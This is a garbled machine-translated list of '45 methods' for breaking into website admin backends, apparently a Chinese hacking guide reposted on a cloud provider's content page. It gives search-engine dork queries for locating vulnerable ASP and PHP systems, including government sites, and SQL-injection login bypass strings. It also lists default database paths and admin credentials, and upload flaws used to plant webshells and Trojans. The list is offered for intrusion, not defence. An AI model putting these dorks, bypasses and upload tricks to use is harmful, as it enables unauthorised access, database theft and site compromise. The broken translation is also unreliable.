45 methods for attacking the background

Source: Internet
Author: User
Tags vbulletin

1. Google search, site: cq.cn inurl: asp)

2. Search for some keywords on Google, edit. asp? South Korea has many bots, most of which are MSSQL databases!
3. Use a zombie and an ASP Trojan:
The file name is login. asp.
......
Path group is/manage/
Keyword: went. asp
Use 'or' = 'or' to log on
4. because too many people have done this, some website administrators have taken preventive measures and the success rate is not high:
Keyword: "Co Net MIB Ver 1.0 website background management system"
The account password is 'or' = 'or'
5. Dynamic Shopping System. Think of the bright boy:
Inurl: help. asp login, if not registered as a member!
You can select either upLoad_bm1.asp or upLoad_c1.asp. Generally, administrators ignore these two vulnerabilities.
6. Default database address: blogdata/acblog. asa
Keyword: acblog
7. Baidu/htdocs
You can directly upload the asa file during registration!
8./Database/# newasp. mdb
Keywords: NewAsp SiteManageSystem Version
9. Excavator
Keyword: Powered by WEBBOY
Page:/upfile. asp
10. Search for Ver5.0 Build 0519 in baidu
(Upload vulnerability exists)
11. Upfile_Article.asp bbs/upfile. asp
Keyword: powered by mypower,
What is the upload vulnerability? There are also many users.
It is estimated that you will be able to dig the chicken.
12. inurl: winnt \ system32 \ inetsrv \
Enter this in google to find many websites.
13. Now GOOGLE searches for the keyword intitle: Website Assistant inurl: asp
14. Keywords: homepage latest news newbie guide dance music download center classic article gamer elegance equipment purchase station rumor friendship connection station Forum
Add setup. asp to the keyword
15. VBulletin Forum Database
Default database address!
/Shortdes/functions. php
Tools:
1) website hunter. : Baidu Google!
2) Google
Keywords:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
One of them is enough.
16
1) Open Baidu or GOOGLE search and enter powered by comersus ASP shopping cart
Open source.
This is a mall system.
2) There is a Comersus Open Technologies LC at the bottom of the website. Open it and check it ~~ Comersus system ~
Guess, comersus. mdb. Is the Database Name
All databases are placed after the database,
So database/comersus. mdb
Comersus_listCategoriesTree.asp is replaced by database/comersus. mdb, which cannot be downloaded.
Remove the previous ''store/"and add database/comersus. mdb.
All are default database addresses
17. Carefree legend Official Site program.
1) backend management address: http: // your domain name/msmiradmin/
Or http: // your domain name/admin. asp
2) Default background management account: msmir
3) Default background management password: msmirmsmir or msmir
The database file is http: // your domain name/msmirdata/msmirArticle. mdb
Or http: // your domain name/msmirdata/msmirArticle. asa
The database connection file is **********/Conn. asp.
It is also the default database address. This is the legend of 4F. Well, I just got it'
18. Enter/skins/default/in Baidu/
19. using excavators
Key servers: power by Discuz
Path:/wish. php
Cooperation:
Discuz! Wish. php Remote Vulnerability in Forum
......
20. Upload Vulnerability.
Tool: Of course, it's still James.
The web site hunter or zombie.
Keyword: powered by mypower
Insert upfile_photo.asp to the detected page or file
There are also N users ..
21. New cloud Vulnerabilities
This vulnerability is available for both ACCESS and SQL.
Google searches for the keyword "about this site-website help-advertising cooperation-download Declaration-friendship connection-website map-management login"
Put flash/downfile. asp? Url = uploadfile/http://www.xxxx.com/conn.asp to the website root directory. You can download conn. asp
Most download sites, such as source code and software.
We often encounter databases that can be downloaded if they are in the front or in the middle # They can be replaced #.
\ Database \ # newasp. mdb
For example: # Change xzws. mdb to # xzws. mdb
Collected. I have never tried... --!
22. All shopping malls and power upload Systems
Tool used: Xiaoji v1.1 mingxiao
Mall intrusion:
Keywords: purchase-> Add to shopping cart-> go to cashier-> confirm Recipient Information-> select payment method-> select delivery method-> online payment or remittance after order-> remittance confirmation-> delivery-> complete
Vulnerability page: upload. asp
Upfile_flash.asp
Or Upload Vulnerability webshell
23. Injection Vulnerability
Baidu search ioj's blog
24. ease of operation
Column directory
Admin_articlerecyclebin.asp
Inurl: admin_articlerecyclebin.asp
25,
Tool: web site hunter
Keywords: inurl: Went. asp
Suffix: manage/login. asp
Password: 'or' = 'or'
This software is not very familiar. --
26,
Intrusion into Warcraft private server
Required tool: ASP Trojan --! Nonsense.
Mingkido
Keyword: All Right Reserved Design: Game Alliance
Background address: admin/login. asp
Database address: chngame/# chngame. mdb
All are default. You can decrypt the database by yourself.
27,
The vulnerability is caused by an error in the iis settings of the Administrator.
The baidu keyword is a rare Script Name.
Dynamic Network: ReloadForumCache. asp
Leadbbs: makealltopanc. asp
BBSXP: admin_fso.asp
Ease of use: admin_articlerecyclebin.asp
It seems that this is not quite clear ..
28,
Database explosion vulnerability on foreign sites
Keyword: sad Raven's Guestbook

Password address:/passwd. dat
Background address:/admin. php
29,
Discuz 4.1.0 cross-site Vulnerability
Tools used: 1) WAP browser
2) WAP encoding Converter
Keyword: "intextiscuz! 4.1.0 ″
WAP browser ..............................!!
30,
Keyword: sunnex
Background path/system/manage. asp
Directly upload an ASP Trojan
Go to the excavator .. --!
31,
Tools
1: web site hunter
2: DAMA
Keywords: Do not disable Cookies; otherwise, you will not be able to log on
Insert diy. asp
32,
Keywords: Team5 Studio All rights reserved
Default Database: data/team. mdb
The rest is self-built. Not much.
33,
Tool: excavator auxiliary database Reader
Keywords: Enterprise Profile product display product list
Suffix:/database/myszw. mdb
Background address: admin/Login. asp
All are default. Same. When the database goes off, unlock the password. That's all .. --
34,
Key sub-XXX inurl: Nclass. asp
......
Write a trojan in system settings.
Will be saved to config. asp.
35,
Use WEBSHELL without entering the background
Data. asp? Action = BackupData default path for Online Database Backup
I have never tried... I don't know.
36,
Tool: WebShell
Keyword: inurl: Went. asp
Suffix: manage/login. asp
Weak Password: 'or' = 'or'
I have never tried it. ......
37,
Keyword owered byCDN_NEWS
Scan the article and add a 'to test the injection points.
Background address: admin_index.asp
I won't say anything about the tool .........
38,
Intrude into leichi News Publishing System
Keyword: leichinews
Remove the values after leichinews.
MARK: admin/uploadPic. asp? ActionType = mod & picName = xuanran. asp
Upload another Trojan .....
Access uppic anran. asp to log on to the Trojan.
--
No. Sweat, collected.
39,
The tool excavator is enough.
Keyword: ower System Of Article Management Ver 3.0 Build 20030628
Default database: database \ yiuwekdsodksldfslwifds. mdb
Background address: scan by yourself!
Tool. --! Why is it him.
MD5 solution .........
(NND: a lot. You can try it ..)
40,
1. Search for a large number of injection points through GOOGLE
Keyword: asp? Id = 1 gov.jp/asp? Id =
Page: 100
Language: Enter the language of the country you want to intrude.
41,
Keyword: Powered by: 94 KKBBS 2005
Retrieve admin Using password retrieval
Q: ddddd answer: ddddd
42,
Keyword: inurl: Went. asp
The background is manage/login. asp.
Background password: 'or' = 'or "=" or '.
Default database address: atabase/DataShop. mdb
43,
Keyword: ***** inurl: readnews. asp
Change the last/to \. The database is exposed to brute force attacks, check the password, and enter the background.
Add a piece of news and enter a trojan in the title.
44,
Tool: one-sentence Trojan
BBsXp 5.0 sp1 administrator Interpreter
Keywords: powered by bbsxp5.00
Back up a sentence in the background!
45,
Keywords: Program core: BJXSHOP online shop expert
Background:/admin

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.